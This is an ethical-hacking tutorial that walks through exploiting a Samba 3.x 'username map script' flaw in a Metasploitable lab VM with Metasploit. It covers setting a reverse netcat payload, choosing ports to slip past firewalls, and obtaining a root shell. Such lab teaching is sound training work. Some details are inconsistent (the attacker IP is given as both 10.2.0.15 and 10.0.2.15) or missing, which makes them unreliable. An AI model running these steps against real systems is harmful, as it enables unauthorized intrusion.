In this section, we will explore more advanced uses of Metasploit by exploiting a code execution vulnerability in a specific service to gain full access to the target computer. After identifying the Samba server version 3.X on port 139 using Nmap, we searched for Samba 3.X exploits on Google and found the “username map script” exploit on Rapid7. This exploit, named “exploit/multi/samba/usermap_script,” allows for command execution. We will follow the same process as in the previous section, as seen in the screenshot.
To start, we will launch Metasploit by running the command “msfconsole” in our console. Once we have launched Metasploit, we will use the command “use” followed by the name of the exploit that we want to use, which in this case is “exploit/multi/samba/usermap_script”. Next, we will run the “show options” command to see the options that we need to set before running the exploit. The complete command will be “use exploit/multi/samba/usermap_script” followed by “show options”.
The process of using exploits is generally the same, with the only variation being the options that can be set for each exploit. We start by using the “use” command followed by the exploit name, and then use the “show options” command to check the options we can modify to work with the exploit. Finally, we run the exploit using the “use <exploit name>” command with the desired options set.
To set up RHOST, which is the IP of the target computer, we use the same method as in the previous section. We use the set command to set the RHOST option to the IP of the target computer, which is 10.0.2.4. After setting the option, we run the show options command to verify that RHOST has been set correctly, which is shown in the following screenshot.
In contrast to the previous section where we needed a pre-installed backdoor on the target computer, this section features a normal program with code execution vulnerabilities and buffer overflow. Unlike the previous case, this program does not have any code to run Linux commands. Instead, it has a specific flaw that will enable us to run a small piece of code called payloads. To exploit the vulnerability and gain access, we need to create a payload and execute it on the target computer. The payload will enable us to perform various actions on the target computer.
In the future, we will explore different types of payloads that can allow us to execute Linux commands. To view the available payloads that can be used with a specific exploit, we can use the “show payloads” command. There are various types of payloads that we can utilize, as depicted in the accompanying screenshot.
After exploiting the vulnerability, a payload – a small piece of code – will be executed on the target computer. The payload that we choose will determine the action that will be performed. As seen in the screenshot, the available payloads are all command line, allowing us to execute Linux commands on the target computer. It should be noted that these payloads only work on Unix, as our target is a Linux machine.
There are primarily two types of payloads that we can use, namely Bind payloads and Reverse payloads.
- Bind payloads function by opening a port on the target computer, enabling us to connect to that port and execute commands.
- Reverse payloads, on the other hand, work in the opposite way. They open a port on our machine and then establish a connection from the target computer to our machine. This approach can be particularly advantageous in situations where firewalls are in place. Since firewalls typically filter any incoming connections to the target machine, the reverse payload can help bypass such restrictions. By having the target machine initiate the connection to our machine, we can circumvent the firewall restrictions and execute the necessary commands.
We will use the cmd/unix/reverse_netcat payload, which specifies the programming language or tool to be used for the connection. In the previous screenshot, we can see that there are different payloads written in various programming languages such as Perl, PHP, Python, Ruby, or a tool like Netcat, which enables connection between computers. However, we will be using the cmd/unix/reverse_netcat payload in the same way as the exploit, by setting it using the “set” command. The command would be:
To set a payload, we follow a process similar to setting an option. First, we use the “show options” command to identify any additional options that need to be set based on the selected payload. When selecting a payload, there are typically more options to configure. For example, in the provided screenshot, there is an option called “LHOST,” which refers to the listening address, i.e., our own address. It is crucial to set this option appropriately to establish a successful connection with the target machine.
To obtain our own IP address, we can use the command “ifconfig” and in this case, the IP address is 10.2.0.15, which is shown in the screenshot.
To set the LHOST, we will use the same process that we used for setting the RHOST. Specifically, we will use the “set” command followed by the name of the option we want to modify, and then the desired value that we wish to set it to. In this instance, we will set the LHOST to 10.2.0.15. Therefore, we will use the command “set LHOST 10.2.0.15” to assign the desired value to the option.
To confirm that everything is set up correctly, we can run the command “ifconfig” to get our own IP address, which in this case is 10.2.0.15. After that, we can run the “show options” command to check if everything is set up correctly. In the screenshot, we can see that all the required options are set up correctly.
In the current exploit scenario, we have set the RHOST to 10.0.2.4, and the LHOST to 10.0.2.15, which is the desired configuration. Additionally, we have the option to specify the port that we will be listening on our computer.
Choosing port 80 could be advantageous because it is typically not filtered by firewalls, as web browsers use this port. By setting the LPORT to 80, the target computer will attempt to connect to us through that port, and the firewall will likely allow it. However, in this specific scenario, we cannot use port 80, as we already have a web server running on that port.
Therefore, we will set the LPORT to 5555, similar to how we set the LHOST. After executing the “show options” command, we can confirm that the port has been updated to 5555, as depicted in the screenshot.
Next, we will execute the exploit command to initiate the exploit. As shown in the screenshot below, we can see that session 1 has been established, and the connection is between our device, 10.0.2.15:5555, and the target device, 10.0.2.4:48184.
To evaluate our current status, we will execute some commands. Firstly, we will use the “pwd” command to display the current directory. Then, we will use the “id” command to check our user identity, which should indicate that we are logged in as the root user.
Using the “uname -a” command, we can confirm that we are operating in the Metasploitable machine. We can also use the “ls” command to display a list of files and directories within the current directory, among other things.
It is important to note that we can employ any Linux command in this context, as we did in the previous section.
We believe that this article is useful to you to know the details regarding Exploiting a Code Execution Vulnerability. For more information on Ethical Hacking, do follow us @ tutorials.freshersnow.com.